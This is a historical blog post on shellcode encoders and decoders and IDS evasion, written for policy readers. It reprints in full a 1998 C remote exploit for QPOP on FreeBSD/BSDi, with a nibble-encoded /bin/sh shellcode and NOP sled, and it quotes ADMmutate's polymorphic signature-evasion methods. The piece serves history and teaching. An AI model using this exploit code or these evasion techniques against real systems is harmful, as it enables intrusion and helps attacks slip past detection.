CyberSecPolitics: The Lost Art of Shellcode Encoder/Decoders

Introduction

Networked intrusion detection systems used to be a thing. But more importantly, stack overflows used to be a thing. And both of the attack that is a stack overflow, and the defense that is an IDS, turned an entire generation of hackers into experts at crafting encoder/decoders, with vestigial codepaths like a coccyx all throughout Metasploit and CANVAS and Core Impact and other tools from that era.

This post is a walkthrough of the entire problem space, from a historical perspective. If you either did not live through this era, or were not involved in information security at a technical level, then this is the only overview you will ever need, assuming you also click all the links and read those papers as well. This is the policy blog, and this post is for policy people who want to get up to speed on both the technical background of the basic cyber domain physics and anyone else interested in the subject: thousands upon thousands of hours writing shellcode went into this piece.

Decoders

A "shellcode decoder" takes an arbitrary encoded string, and then converts it into its original form and then executes it.

In modern times, you rarely use a shellcode decoder, since most places in memory that are readable are not executable so you have a "ROP Chain" instead. But it's important to study shellcode decoders, even if just as a student of history, because they point us to some basic physics in terms how cyber war works.

This simple stack overflow training tool shows how a list of "bad bytes" used to be a very important part of the entire exploitation process (\x00\r\n was a typical minimal set).

Imagine a simpler system, Windows 2000 perhaps, with simpler bugs, a strcpy(stackbuffer, input) or sprintf(stackbuffer,"%s\r\n", input). I'm not going to go over Buffer Overflows 101, as it was 15 years ago, except to say this: It had three simple features.

Your string was limited in length
Your string could have almost all values, but not 0x00
Your string would clobber various variables as you went towards the stored EIP, but you didn't want the program to crash when it used those variables

It's also true that x86 used to be a niche architecture, for specialists. Real hackers were so multi-lingual they often knew more platforms than they had pants. SPARC, MIPS, Alpha, x86, PA-RISC, POWER, etc. And on top of these chips, a multitude of OS types. SunOS was not Solaris was not Irix was not Tru64 was not HP-UX. But they all ran the same buggy software so you would often see exploits that had code for all major platforms in one file.

Zero-Free Shellcode

The first thing everyone did was write a shellcode that contained no zeros. Then you would have to do that for every platform, optimized for size. Then you would do that again, but also avoiding \r\n. Then again for removing spaces and plus signs. Then again, but instead of running /bin/sh and assuming stdin and stdout were useful, it would connect back to a listening host and proxy your connection.

Clearly this gets old fast. But one shellcode per exploit had a side benefit: Everyone's was slightly different. My shellcode did not look like Duke_'s or Str's. And that made life harder for the primitive IDSs prowling the primordial cyber oceans, like sea scorpions with limited perception and infinite hunger.

You can see this fascinating display of early-lifeform diversity on many websites, such as here.

This website doesn't say which badbytes are avoided by each shellcode for some reason.

This was an era before giant-botnets and router hackers made it so your exploits were never more than two hops away from your target. So while you COULD play network games to avoid an IDS, say send five different fragments, some of which you knew would get dropped by your target's network layer, but the IDS did not, it was hard to predict how confused the network layer a full second of ping time away from you would handle these kinds of shenanigans. So best to just not be the string they were looking for.

Early Decoders

Most people very quickly wrote a FOR loop in assembly, that when executed XORed a string behind them with a fixed key. Of course, this sucks in so many ways.

First of all, picking which byte you were going to XOR an unknown string with means that sometimes there is NO byte that does not result in a 0x00 in the resultant string. For small hand-crafted exploits this was no problem: you picked an encoder, xor byte, and payload string and if they did not meet your needs, you adjusted them manually. (CANVAS used an "ADD" instead of an "XOR" for this reason).

As a prescient case study, let's look at Stran9er's BSDi shellcode:

/*
 * QPOP (version 2.4b2) _demonstration_ REMOTE exploit for FreeBSD 2.2.5.
 * and BSDi 2.1
 * 24-Jun-1998 by stran9er
 *
 * Based:
 *         FreeBSD/BSDi shellcode from some bsd_lpr_exploit.c by unknown author.
 *         x86 decode.bin/encode.c by Solar Designer.
 *
 * Disclaimer:
 *         this demonstration code is for educational purposes only! DO NOT USE!
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ESP 0xefbfd480
#define BMW 750

main(int argc, char **argv)
{
   int i,t,offset = 500;
   char buf[1012];
   char nop[] = "\x91\x92\x93\x94\x95\x96\x97\xF8\xF9\xFC\xFD";
   char decode_x86[] =
      "\x68\x5D\x5E\xFF\xD5\xFF\xD4\xFF\xF5\x8B\xF5\x90\x66\x31\x7D\x30"
      "\x33\x7D\x30\x90\x90\x8B\xC7\x66\x2D\x5D\x5D\xD5\x21\x8B\xFD\x83"
      "\xC7\x02\x8B\xEF\x90\x90\x90\x8A\xE0\x8B\xFE\x83\xC6\x01\x32\x67"
      "\x30\x30\x67\x30\x90\x75\xD5";/*\x79\x5F\x7D\x60\x5D\x63\x70\x5E"*/
   char shellcode_BSDi[] =
      "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
      "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
      "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
      "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
   
   fprintf(stderr, "QPOP (FreeBSD v 2.4b2) remote exploit by stran9er. - DO NOT USE! -\n");
   if (argc>1) offset = atoi(argv[1]);
   fprintf (stderr,"Using offset %d (esp==0x%x)",offset,ESP);
   offset+=ESP;
   fprintf (stderr," esp+offset=0x%x\n\n",offset);
   for(i=0;i<sizeof(buf);i++) buf[i]=nop[random()%strlen(nop)];
// memset(buf, 0x90, sizeof(buf));
   buf[sizeof(buf)-1]=0;
   for(i=0;i < (sizeof(decode_x86)-1);i++) buf[i+BMW] = decode_x86[i];
   for(t=0;t < sizeof(shellcode_BSDi);t++) {
    buf[t*2+i+BMW+0] = (unsigned char)shellcode_BSDi[t] % 0x21 + 0x5D;
    buf[t*2+i+BMW+1] = (unsigned char)shellcode_BSDi[t] / 0x21 + 0x5D;
   }
   buf[1008] = (offset & 0xff000000) >> 24;
   buf[1007] = (offset & 0x00ff0000) >> 16;
   buf[1006] = (offset & 0x0000ff00) >> 8;
   buf[1005] = (offset & 0x000000ff);
   printf("%s\n",buf);
}
/* -- CONFIDENTIAL -- */

This code had some interesting features: It randomized the NOP sled, avoiding 0x90 entirely, and it used a nibble encoder to bypass the bad bytes of Qpop. In shellcode used in real exploits (as opposed to academic papers) you are optimizing not for length(arbitrary shellcode), but for length(decoder)+length(encoded specific shellcode) + difficulty of manually writing the decoder. This made nibble encoding (aka, 0xFE -> 0x4F 0x4E) a popular solution even though it doubled the size of your shellcode.

One reason this kind of shellcode decoder was popular is that you often had to pass through a tolower() or toupper() function call on the way to your overflow as back then most overflows were still in strings passed around via text protocols.

Windows

This brings us to the Windows platform which was notable for two major reasons:

Shellcodes needed to be larger to accommodate for finding functions by their hash in the PE header - so expanding them became more dangerous
Unicode became a thing
You rarely got to attack a service more than once (Unix services often restarted after they crashed, but Windows never did)

Chris Anley was the first to find some ways around the Unicode problem, which he called "Venitian" decoding. Typical UTF-16 would do some horrible things to your shellcode: It would insert zeros as every second byte.

To quote from his paper directly.

Why yes, Chris, that IS a complication.

Other hackers, myself and Phenoelit, included, then furthered this work by formalizing it and generalizing it to particular exploits we were working on in the 2003 era. However, the key realization was essentially that when you started your exploit, there were some things you knew, including the values of registers and particular sets of memory, that made some of these seemingly intractable problems perfectly doable.

AlphaNumeric shellcodes

This brings us to another shellcode innovation (2001) in which various people attacked the heavily restricted filter on x86: isalnum(). What you should be internalizing by now, if you've never written a shellcode decoder, is that each decoder attacked a specific mathematical transformation function of basically arbitrary complexity. The original Phrack article is here, but the code to generate the shellcodes is here. Skylined is still quite active and you can see his INFILTRATE slides here.

Another common shellcode of the time was the eggsearch shellcode, particularly on Windows, where you would need a tiny shellcode that could find a much larger more complicated shellcode, somewhere else in memory. This was quite difficult in practice as your stage-2 shellcode was almost certainly in many different places in RAM, corrupted in different ways. Likewise, searching all of RAM requires handling exceptions when accessing memory that was not mapped. With Windows you had the ability to use the built-in exception handling, but every other platform required a system call that could be used as an oracle to find out if a page was accessible or not. The other major issue was timing: Going through all of RAM takes a long time on older systems, and your connection might time out, triggering cleanups and unfortunate crashes. For systems which stored most of your data in writable but not executable pages, you'll also want to mprotect() it back to something which can execute before jumping to it, which added size and complexity. In writing shellcode, things that seem simple can often be quite complicated.

RISC Shellcode

So far this sojourn through history has ignored some key features with platform diversity: RISC systems. Early RISC systems each had some large subset of the following:

branch delay slots
code vs data caches
aligned instructions
register windows
huge amounts of registers
hardware support for Non-Execute memory pages
Per-Program system call numbers (lol!)

Sometimes the stack would go backwards (HPUX) or do other silly things as well (i.e. Irix systems often ran on one of many possible chips each of which was quite different!). There were many more features that Unix hackers dealt with long before Windows or Linux hackers had to.

LSD-PL TTDBSERVERD exploit shellcode for Solaris.

Recently, Horizon and I were reminiscing about the bn,a bn,a which characterized early Solaris SPARC shellcode. The goal of the first set of instructions of almost ANY shellcode is to FIND OUT WHERE IN MEMORY YOU ARE. This is difficult on most platforms, as you cannot just:

mov $eip, $reg

Instead, you engaged in some tricks, by using CALL (which typically would PUSH the current address onto the stack or store it in some utility register). In SPARC's case, the branch delay slot meant that the bn,a instruction would "Branch never, and annul (skip over) the next instruction". So the first three instructions in the shellcode above would load the location into a register by calling backwards, then skipping the call function. You'll notice bn,a has \x20 (space) as the first character, which meant a lot of shellcode had instead a slightly longer variant that set a flag with an arithmetic instruction, and then used "branch above" or "branch below" instead, depending on the particular bad bytes in place.

On x86 you could also do funny tricks with the floating point or other extended functions, for example this code by Noir:

"Still not perfect though"

Caching

Many shellcode decoders on RISC had a simple problem: When you change the data of a page, that change might not exist in the CPU's code cache. This led to extremely difficult to debug situations where your shellcode would crash in a RANDOM location on code that seemed perfectly good. And when you attach to it with a debugger and step through it, it would work every time.

The code and data caches get synchronized when any context switch happens or by a special
"Flush" instruction which never ever works for some unknown reason. Context switches happen whenever the CPU decides to execute another thread, which means sometimes you could force your exploit to be more reliable by placing the CPU under load. This of course, also involves "Register Windows" which meant that your use of the stack could be entirely different depending on the load of the processor, with more than one offset in your attack string for EIP. RISC IS NEAT RIGHT?

There were two main reliable ways to handle data vs code cache coherence problems. They were as follows:

Include an infinite loop at the end of your shellcode, and modify it to a NOP with your decoder. When the loop is cleared, you know the cache is flushed!
Fork() or call another system call that you know will change contexts and flush the cache.

ADMmutate

If 1999 K2 (Shane Macaulay) wrote a polymorphic shellcode library called ADMmutate which ended up being the top tier of shellcode operational security tools. The basic theory was that you could mutate almost all elements of your shellcode, and still have it work reliably. He explains the basic technique thusly:

So what do we have now? We have encoded shellcode, and substituted NOP's, all we need is to place our decoder into the code. What we have to be careful about is to produce code that resists signature analysis. It would not be cool if the IDS vendor could simply detect our decoder.

Some techniques that are used here are multiple code paths, non operational pad instructions, out-of-order decoder generation and randomly generated instructions.

For instance, if we intend to load a register with some known data (our decode key), we can push DATA, pop REGISTER or we can move DATA,REGISTER or CLEAR REGISTER, add DATA,REGISTER, etc... endless possibilities. Each instruction of the decoder can be substituted by any number equivalent instructions, so long as the algorithm is not changed.

Another technique is non operational padding, to accomplish this, when generating the decoder we ensure that there are some spare CPU registers that are left available for any operation we see fit. For example, on IA32 EAX was selected, as it is optimized to be used with many instructions, and is occasionally the implicit target of an operation.

This allows us to pad every instruction in our decoder with one of or more JUNKS!!! MUL X EAX, SHR X EAX, TEST EAX,EAX, etc... (X is randomly selected from an array of integers that passed through all shellcode requirements.)

To further reduce the pattern of the decoder, out-of-order decoders are now supported. This will allow you to specify where in the decoder certain operational instructions may be located.

What this did when it went public is force every IDS vendor to either acknowledge failure, move to protocol parsing instead of signature detection, or emulate x86 (and other) architectures in order to draw heuristics on likely "executability" of strings.

None of these is a good option, and most of them are extremely RAM and CPU intensive. Yet network IDS systems are supposed to work "at scale". However, even today, most IDSs are still globbing byte streams like it was 1998.

Mutated System Call Numbers

AIX had a neat feature where the system call numbers were not static, which was especially a problem on remote exploits where fingerprinting was difficult. There was a decent paper from San (of XFocus) on this, where he used dtspcd to get a remote system's exact version, and another more recent one, although the better way is probably to build a XCOFF-parser shellcode from the "table of contents" pointer and call LibC functions directly, much as you would do in Windows. You'll note there are relatively a lot less public buffer overflow exploits for AIX than you would expect, if you do a survey, even for locals.

Conclusion

What historical shellcode DID once it ran is the topic of another blogpost, but for now it is easiest from a policy perspective to look at this entire topic as whether or not you have to store state, and if so, where. This concept drives down to the deepest levels of what technology will work on both defense and offense as it is a fundamental tradeoff, like matter vs energy, or Emacs vs VI. Hopefully you got something out of this more technical post! If you liked it, let us know and we'll continue the series with a section on system call proxying.

3 comments:

DanielMarch 12, 2019 at 2:15 PM
Ah man, what a neta post :D
Obligatory CCS 2009 English shellcode https://www.cs.jhu.edu/~sam/ccs243-mason.pdf
and 2016 methodology to automatically turn arbitrary ARMv8 programs into alphanumeric executable polymorphic shellcodes https://arxiv.org/pdf/1608.03415.pdf
dịch thuật chuyên nghiệpMarch 12, 2019 at 11:19 PM
This comment has been removed by a blog administrator.

Tuesday, March 12, 2019

The Lost Art of Shellcode Encoder/Decoders